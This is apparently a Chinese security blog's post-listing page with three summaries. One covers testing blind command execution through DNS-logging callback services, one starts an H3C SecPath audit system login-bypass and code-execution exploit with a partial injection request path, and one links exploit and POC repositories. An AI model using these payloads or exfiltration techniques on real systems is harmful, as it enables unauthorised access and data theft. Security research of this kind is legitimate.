2021年6月30日
通过dnslog和ceye.io测试无回显的命令执行
摘要: http://dnslog.cn/ ###0x01 windwos主机使用方法 变量 类型 描述 %USERNAME% 返回当前登录的用户的名称。 %USERDOMAIN% 返回包含用户帐户的域的名称。 %OS% 返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。 阅读全文
posted @ 2021-06-30 21:50 q1ya 阅读(1168) 评论(0) 推荐(0) 编辑
H3C SecPath 运维审计系统任意用户登录+代码执行
摘要: ###0x00 H3C SecPath 运维审计系统 fof语法 "H3C SecPath 运维审计系统" 初步测试此版本可用 ###0x01 输入以下代码实现任意用户登录获取Cookie /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97 阅读全文
posted @ 2021-06-30 21:03 q1ya 阅读(597) 评论(0) 推荐(0) 编辑
漏洞文库合集(POC EXP)
摘要: ####1、CVE、CMS、中间件漏洞检测利用合集 https://github.com/mai-lang-chai/Middleware-Vulnerability-detection ####2、POC&EXP仓库、hvv弹药库、Nday、1day https://github.com/Dawn 阅读全文
posted @ 2021-06-30 19:47 q1ya 阅读(7368) 评论(0) 推荐(0) 编辑